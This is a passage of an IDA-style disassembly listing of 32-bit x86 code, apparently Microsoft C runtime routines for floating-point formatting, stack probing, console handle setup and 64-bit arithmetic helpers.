mov ebp, esp
sub esp, 30h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 16h
pop edi
push edi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp esi, ebx
jnz short loc_41121F
loc_411204: ; CODE XREF: sub_4111CC+58�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
jmp loc_4112B5
; ---------------------------------------------------------------------------
loc_41121F: ; CODE XREF: sub_4111CC+36�j
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jbe short loc_411204
mov eax, [ebp+var_2C]
dec eax
mov [ebp+var_20], eax
xor eax, eax
cmp [ebp+var_30], 2Dh
setz al
cmp ecx, 0FFFFFFFFh
lea edi, [eax+esi]
jnz short loc_411242
or ecx, ecx
jmp short loc_411244
; ---------------------------------------------------------------------------
loc_411242: ; CODE XREF: sub_4111CC+70�j
sub ecx, eax
loc_411244: ; CODE XREF: sub_4111CC+74�j
lea eax, [ebp+var_30]
push eax
push [ebp+arg_C]
push ecx
push edi
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_41125D
mov [esi], bl
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_41125D: ; CODE XREF: sub_4111CC+8B�j
mov eax, [ebp+var_2C]
dec eax
cmp [ebp+var_20], eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_411299
cmp eax, [ebp+arg_C]
jge short loc_411299
cmp cl, bl
jz short loc_41127F
loc_411275: ; CODE XREF: sub_4111CC+AE�j
mov al, [edi]
inc edi
test al, al
jnz short loc_411275
mov [edi-2], bl
loc_41127F: ; CODE XREF: sub_4111CC+A7�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push [ebp+arg_C]
mov ecx, esi
push [ebp+arg_8]
call sub_41101E
add esp, 10h
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_411299: ; CODE XREF: sub_4111CC+9E�j
; sub_4111CC+A3�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push eax
push [ebp+arg_10]
mov eax, esi
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_4112B5: ; CODE XREF: sub_4111CC+4E�j
; sub_4111CC+8F�j ...
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4111CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112C4 proc near ; CODE XREF: sub_41134A+17�p
; DATA XREF: sub_40F70B+37�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
cmp eax, 65h
jz short loc_41132E
cmp eax, 45h
jz short loc_41132E
cmp eax, 66h
jnz short loc_4112F2
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411113
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4112F2: ; CODE XREF: sub_4112C4+13�j
cmp eax, 61h
jz short loc_411315
cmp eax, 41h
jz short loc_411315
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4111CC
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_411315: ; CODE XREF: sub_4112C4+31�j
; sub_4112C4+36�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410CAD
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_41132E: ; CODE XREF: sub_4112C4+9�j
; sub_4112C4+E�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
loc_411345: ; CODE XREF: sub_4112C4+4F�j
; sub_4112C4+68�j
add esp, 18h
pop ebp
retn
sub_4112C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41134A proc near ; DATA XREF: sub_40F70B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4112C4
add esp, 1Ch
pop ebp
retn
sub_41134A endp
; =============== S U B R O U T I N E =======================================
sub_41136B proc near ; CODE XREF: sub_40F76B+16�p
push esi
push 30000h
push 10000h
xor esi, esi
push esi
call sub_4118FF
add esp, 0Ch
test eax, eax
jz short loc_411392
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_411392: ; CODE XREF: sub_41136B+18�j
pop esi
retn
sub_41136B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411394 proc near ; CODE XREF: sub_4113D0:loc_4113F4�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_41EE70
fstp [ebp+var_10]
fld ds:dbl_41EE68
fstp [ebp+var_18]
fld [ebp+var_18]
fdiv [ebp+var_10]
fmul [ebp+var_10]
fsubr [ebp+var_18]
fstp [ebp+var_8]
fld1
fcomp [ebp+var_8]
fnstsw ax
test ah, 5
jp short loc_4113CC
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_4113CC: ; CODE XREF: sub_411394+31�j
xor eax, eax
leave
retn
sub_411394 endp
; =============== S U B R O U T I N E =======================================
sub_4113D0 proc near ; CODE XREF: sub_40F76B+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41D0E4
test eax, eax
jz short loc_4113F4
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41D0EC
test eax, eax
jz short loc_4113F4
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4113F4: ; CODE XREF: sub_4113D0+D�j
; sub_4113D0+1D�j
jmp sub_411394
sub_4113D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411400 proc near ; CODE XREF: sub_4104B0+11�j
; seg000:004104D7�j ...
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_411414: ; CODE XREF: sub_411400+29�j
cmp ecx, eax
jb short loc_411422
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_411422: ; CODE XREF: sub_411400+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_411414
sub_411400 endp
; =============== S U B R O U T I N E =======================================
sub_41142B proc near ; CODE XREF: sub_4104DC+24�p
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push 40000000h
push offset aConout ; "CONOUT$"
call ds:dword_41D06C
mov ds:dword_424224, eax
retn
sub_41142B endp
; =============== S U B R O U T I N E =======================================
sub_41144A proc near ; DATA XREF: seg001:0041D2E0�o
mov eax, ds:dword_424224
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41D0DC
jz short loc_411463
cmp eax, 0FFFFFFFEh
jz short loc_411463
push eax
call esi
loc_411463: ; CODE XREF: sub_41144A+F�j
; sub_41144A+14�j
mov eax, ds:dword_424220
cmp eax, 0FFFFFFFFh
jz short loc_411475
cmp eax, 0FFFFFFFEh
jz short loc_411475
push eax
call esi
loc_411475: ; CODE XREF: sub_41144A+21�j
; sub_41144A+26�j
pop esi
retn
sub_41144A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411480 proc near ; CODE XREF: sub_410CAD+102�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_4114A7
xor eax, eax
jmp short loc_4114A9
; ---------------------------------------------------------------------------
loc_4114A7: ; CODE XREF: sub_411480+21�j
mov eax, edi
loc_4114A9: ; CODE XREF: sub_411480+25�j
cld
pop edi
leave
retn
sub_411480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114AD proc near ; CODE XREF: sub_4109C4+15�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411969
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_41152A
cmp eax, 1
jnz short loc_411515
loc_411504: ; CODE XREF: sub_4114AD+87�j
cmp [ebp+var_18], bl
jz short loc_411510
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411510: ; CODE XREF: sub_4114AD+5A�j
push 3
loc_411512: ; CODE XREF: sub_4114AD+7B�j
pop eax
jmp short loc_411544
; ---------------------------------------------------------------------------
loc_411515: ; CODE XREF: sub_4114AD+55�j
cmp eax, 2
jnz short loc_411536
loc_41151A: ; CODE XREF: sub_4114AD+81�j
cmp [ebp+var_18], bl
jz short loc_411526
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411526: ; CODE XREF: sub_4114AD+70�j
push 4
jmp short loc_411512
; ---------------------------------------------------------------------------
loc_41152A: ; CODE XREF: sub_4114AD+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_41151A
test byte ptr [ebp+var_14], 2
jnz short loc_411504
loc_411536: ; CODE XREF: sub_4114AD+6B�j
cmp [ebp+var_18], bl
jz short loc_411542
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411542: ; CODE XREF: sub_4114AD+8C�j
xor eax, eax
loc_411544: ; CODE XREF: sub_4114AD+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4114AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411553 proc near ; CODE XREF: sub_4109C4+2E�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411EAB
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_4115D0
cmp eax, 1
jnz short loc_4115BB
loc_4115AA: ; CODE XREF: sub_411553+87�j
cmp [ebp+var_18], bl
jz short loc_4115B6
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115B6: ; CODE XREF: sub_411553+5A�j
push 3
loc_4115B8: ; CODE XREF: sub_411553+7B�j
pop eax
jmp short loc_4115EA
; ---------------------------------------------------------------------------
loc_4115BB: ; CODE XREF: sub_411553+55�j
cmp eax, 2
jnz short loc_4115DC
loc_4115C0: ; CODE XREF: sub_411553+81�j
cmp [ebp+var_18], bl
jz short loc_4115CC
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115CC: ; CODE XREF: sub_411553+70�j
push 4
jmp short loc_4115B8
; ---------------------------------------------------------------------------
loc_4115D0: ; CODE XREF: sub_411553+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_4115C0
test byte ptr [ebp+var_14], 2
jnz short loc_4115AA
loc_4115DC: ; CODE XREF: sub_411553+6B�j
cmp [ebp+var_18], bl
jz short loc_4115E8
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115E8: ; CODE XREF: sub_411553+8C�j
xor eax, eax
loc_4115EA: ; CODE XREF: sub_411553+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115F9 proc near ; CODE XREF: sub_410BC1+96�p
; sub_411113+85�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_C]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ecx+0Ch]
jnz short loc_41162C
loc_41160E: ; CODE XREF: sub_4115F9+36�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_411618: ; CODE XREF: sub_4115F9+59�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp loc_4116B1
; ---------------------------------------------------------------------------
loc_41162C: ; CODE XREF: sub_4115F9+13�j
cmp [ebp+arg_4], ebx
jbe short loc_41160E
mov edx, [ebp+arg_8]
cmp edx, ebx
mov [esi], bl
jle short loc_41163E
mov eax, edx
jmp short loc_411640
; ---------------------------------------------------------------------------
loc_41163E: ; CODE XREF: sub_4115F9+3F�j
xor eax, eax
loc_411640: ; CODE XREF: sub_4115F9+43�j
inc eax
cmp [ebp+arg_4], eax
ja short loc_411654
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_411618
; ---------------------------------------------------------------------------
loc_411654: ; CODE XREF: sub_4115F9+4B�j
cmp edx, ebx
mov byte ptr [esi], 30h
lea eax, [esi+1]
jle short loc_411678
loc_41165E: ; CODE XREF: sub_4115F9+7A�j
mov cl, [edi]
cmp cl, bl
jz short loc_41166A
movsx ecx, cl
inc edi
jmp short loc_41166D
; ---------------------------------------------------------------------------
loc_41166A: ; CODE XREF: sub_4115F9+69�j
push 30h
pop ecx
loc_41166D: ; CODE XREF: sub_4115F9+6F�j
mov [eax], cl
inc eax
dec edx
cmp edx, ebx
jg short loc_41165E
mov ecx, [ebp+arg_C]
loc_411678: ; CODE XREF: sub_4115F9+63�j
cmp edx, ebx
mov [eax], bl
jl short loc_411690
cmp byte ptr [edi], 35h
jl short loc_411690
jmp short loc_411688
; ---------------------------------------------------------------------------
loc_411685: ; CODE XREF: sub_4115F9+93�j
mov byte ptr [eax], 30h
loc_411688: ; CODE XREF: sub_4115F9+8A�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_411685
inc byte ptr [eax]
loc_411690: ; CODE XREF: sub_4115F9+83�j
; sub_4115F9+88�j
cmp byte ptr [esi], 31h
jnz short loc_41169A
inc dword ptr [ecx+4]
jmp short loc_4116AF
; ---------------------------------------------------------------------------
loc_41169A: ; CODE XREF: sub_4115F9+9A�j
lea edi, [esi+1]
push edi
call sub_404130
inc eax
push eax
push edi
push esi
call sub_407370
add esp, 10h
loc_4116AF: ; CODE XREF: sub_4115F9+9F�j
xor eax, eax
loc_4116B1: ; CODE XREF: sub_4115F9+2E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4115F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116B6 proc near ; CODE XREF: sub_411771+24�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
movzx eax, word ptr [edx+6]
push ebx
mov ecx, eax
push esi
push edi
shr ecx, 4
and eax, 8000h
mov edi, 7FFh
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_411704
cmp ebx, edi
jz short loc_4116FD
add ecx, 3C00h
jmp short loc_411725
; ---------------------------------------------------------------------------
loc_4116FD: ; CODE XREF: sub_4116B6+3D�j
mov edi, 7FFFh
jmp short loc_411728
; ---------------------------------------------------------------------------
loc_411704: ; CODE XREF: sub_4116B6+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41171C
cmp edx, ebx
jnz short loc_41171C
mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+arg_4]
mov [eax+4], ebx
mov [eax], ebx
jmp short loc_411768
; ---------------------------------------------------------------------------
loc_41171C: ; CODE XREF: sub_4116B6+52�j
; sub_4116B6+56�j
add ecx, 3C01h
mov [ebp+var_4], ebx
loc_411725: ; CODE XREF: sub_4116B6+45�j
movzx edi, cx
loc_411728: ; CODE XREF: sub_4116B6+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_411763
loc_411744: ; CODE XREF: sub_4116B6+AB�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
add edx, edx
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_411744
loc_411763: ; CODE XREF: sub_4116B6+8C�j
mov ecx, [ebp+arg_4]
or ecx, edi
loc_411768: ; CODE XREF: sub_4116B6+64�j
pop edi
pop esi
mov [eax+8], cx
pop ebx
leave
retn
sub_4116B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411771 proc near ; CODE XREF: sub_410BC1+2A�p
; sub_411113+2A�p ...
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
push ebx
mov ebx, [ebp+arg_8]
push esi
mov [ebp+var_30], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4116B6
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_412AB1
mov esi, [ebp+var_30]
mov [ebx+8], eax
movsx eax, [ebp+var_2A]
mov [ebx], eax
movsx eax, [ebp+var_2C]
mov [ebx+4], eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_10]
push esi
call sub_4076D5
add esp, 24h
test eax, eax
jz short loc_4117EB
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_4117EB: ; CODE XREF: sub_411771+69�j
mov ecx, [ebp+var_4]
pop edi
mov [ebx+0Ch], esi
pop esi
mov eax, ebx
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411771 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411800 proc near ; CODE XREF: sub_410CAD+2F7�p
; sub_410CAD+31D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebp
xor edi, edi
xor ebp, ebp
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_411824
inc edi
inc ebp
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_411824: ; CODE XREF: sub_411800+D�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_411840
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_411840: ; CODE XREF: sub_411800+2A�j
or eax, eax
jnz short loc_41186C
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+0Ch+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+0Ch+arg_8]
add edx, ecx
jmp short loc_4118B3
; ---------------------------------------------------------------------------
loc_41186C: ; CODE XREF: sub_411800+42�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41187A: ; CODE XREF: sub_411800+84�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41187A
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4118A8
cmp edx, [esp+0Ch+arg_4]
ja short loc_4118A8
jb short loc_4118B1
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4118B1
loc_4118A8: ; CODE XREF: sub_411800+98�j
; sub_411800+9E�j
dec esi
sub eax, [esp+0Ch+arg_8]
sbb edx, [esp+0Ch+arg_C]
loc_4118B1: ; CODE XREF: sub_411800+A0�j
; sub_411800+A6�j
xor ebx, ebx
loc_4118B3: ; CODE XREF: sub_411800+6A�j
sub eax, [esp+0Ch+arg_0]
sbb edx, [esp+0Ch+arg_4]
dec ebp
jns short loc_4118C5
neg edx
neg eax
sbb edx, 0
loc_4118C5: ; CODE XREF: sub_411800+BC�j
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
dec edi
jnz short loc_4118D9
neg edx
neg eax
sbb edx, 0
loc_4118D9: ; CODE XREF: sub_411800+D0�j
pop ebp
pop esi
pop edi
retn 10h
sub_411800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4118E0 proc near ; CODE XREF: sub_410CAD+1EA�p
; sub_410CAD+23E�p ...
cmp cl, 40h
jnb short loc_4118FA
cmp cl, 20h
jnb short loc_4118F0
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_4118F0: ; CODE XREF: sub_4118E0+8�j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_4118FA: ; CODE XREF: sub_4118E0+3�j
xor eax, eax
xor edx, edx
retn
sub_4118E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118FF proc near ; CODE XREF: sub_41136B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
and eax, 0FFF7FFFFh
and ecx, eax
test ecx, 0FCF0FCE0h
push esi
jz short loc_411949
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_41192D
push esi
push esi
call sub_4134A7
pop ecx
pop ecx
mov [edi], eax
loc_41192D: ; CODE XREF: sub_4118FF+21�j
call sub_4057D3
push 16h
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
pop edi
jmp short loc_411966
; ---------------------------------------------------------------------------
loc_411949: ; CODE XREF: sub_4118FF+17�j
mov esi, [ebp+arg_0]
test esi, esi
push eax
push [ebp+arg_4]
jz short loc_41195D
call sub_4134A7
mov [esi], eax
jmp short loc_411962
; ---------------------------------------------------------------------------
loc_41195D: ; CODE XREF: sub_4118FF+53�j
call sub_4134A7
loc_411962: ; CODE XREF: sub_4118FF+5C�j
pop ecx
pop ecx
xor eax, eax
loc_411966: ; CODE XREF: sub_4118FF+48�j
pop esi
pop ebp
retn
sub_4118FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411969 proc near ; CODE XREF: sub_4114AD+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_4119D3
xor ebx, ebx
xor eax, eax
loc_4119B0: ; CODE XREF: sub_411969+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_4119C3
inc eax
cmp eax, 3
jl short loc_4119B0
xor eax, eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119C3: ; CODE XREF: sub_411969+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_411969+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, ds:dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411A0B
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411A0B: ; CODE XREF: sub_411969+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411AB1
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411A39
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_411969+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411A39: ; CODE XREF: sub_411969+C9�j
jnz short loc_411A43
inc eax
cmp eax, 3
jl short loc_411A34
jmp short loc_411AB1
; ---------------------------------------------------------------------------
loc_411A43: ; CODE XREF: sub_411969:loc_411A39�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411A5D
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411A5D: ; CODE XREF: sub_411969+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411A9C
cmp [ebp+arg_0], edx
jmp short loc_411A9A
; ---------------------------------------------------------------------------
loc_411A7F: ; CODE XREF: sub_411969+143�j
test ecx, ecx
jz short loc_411AAE
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411A9C
cmp esi, 1
loc_411A9A: ; CODE XREF: sub_411969+114�j
jnb short loc_411AA3
loc_411A9C: ; CODE XREF: sub_411969+10F�j
; sub_411969+12C�j
mov [ebp+var_4], 1
loc_411AA3: ; CODE XREF: sub_411969:loc_411A9A�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411A7F
loc_411AAE: ; CODE XREF: sub_411969+118�j
mov [ebp+arg_0], ecx
loc_411AB1: ; CODE XREF: sub_411969+B5�j
; sub_411969+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411AD1
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
